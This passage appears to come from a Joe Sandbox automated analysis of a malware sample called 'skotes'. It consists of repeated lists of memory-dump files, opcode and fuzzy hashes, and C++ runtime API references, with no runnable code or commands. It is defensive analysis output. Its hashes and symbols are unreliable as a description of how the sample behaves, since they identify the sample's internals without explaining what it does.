                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1319684358-0
                                                                                                                                                                                            • Opcode ID: 089452396881f36aab52444b5bac1bcf331d832bcbeaee2a0f47cc00ad5d9993
                                                                                                                                                                                            • Instruction ID: f08bb2f6d6e6cee911bd5ee0b12e09bb0b60f450068c8aa43f6a41a469cd2a89
                                                                                                                                                                                            • Opcode Fuzzy Hash: 089452396881f36aab52444b5bac1bcf331d832bcbeaee2a0f47cc00ad5d9993
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9131AD71E002058FCB14DFA8D8416EDB7B6AF09310F68406EE845E7350DB31DE82CBA4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID: vc
                                                                                                                                                                                            • API String ID: 3213747228-1240431118
                                                                                                                                                                                            • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                            • Instruction ID: 2f7fd2fbb289bced53943726b9d32a988de8dd5284a265e1c52b78e70dfc5fd8
                                                                                                                                                                                            • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                            • Instruction Fuzzy Hash: BFB1F1329046459FDB158F28C881BEEBBE6EF45360F1481AAF855FB342D6349D02CBE4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00631B57
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00631B66
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00631C2A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                            • String ID: pContext$switchState
                                                                                                                                                                                            • API String ID: 2656283622-2660820399
                                                                                                                                                                                            • Opcode ID: cd1764ef4992324eeb2c792c8dbc7e9fea326253436230c66c26dee50f5ed527
                                                                                                                                                                                            • Instruction ID: a17f0c0de797cbf85e2447a00fbdda027d6a118497e66223582dc2cb2f2536fe
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd1764ef4992324eeb2c792c8dbc7e9fea326253436230c66c26dee50f5ed527
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531A335A00214ABCF05EF64C881AADB3B7BF46310F244569E9129B382EB71EE05CAD4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00634E6D
                                                                                                                                                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00634E86
                                                                                                                                                                                            • PMDtoOffset.LIBCMT ref: 00634EAC
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                            • String ID: Bad dynamic_cast!
                                                                                                                                                                                            • API String ID: 1467055271-2956939130
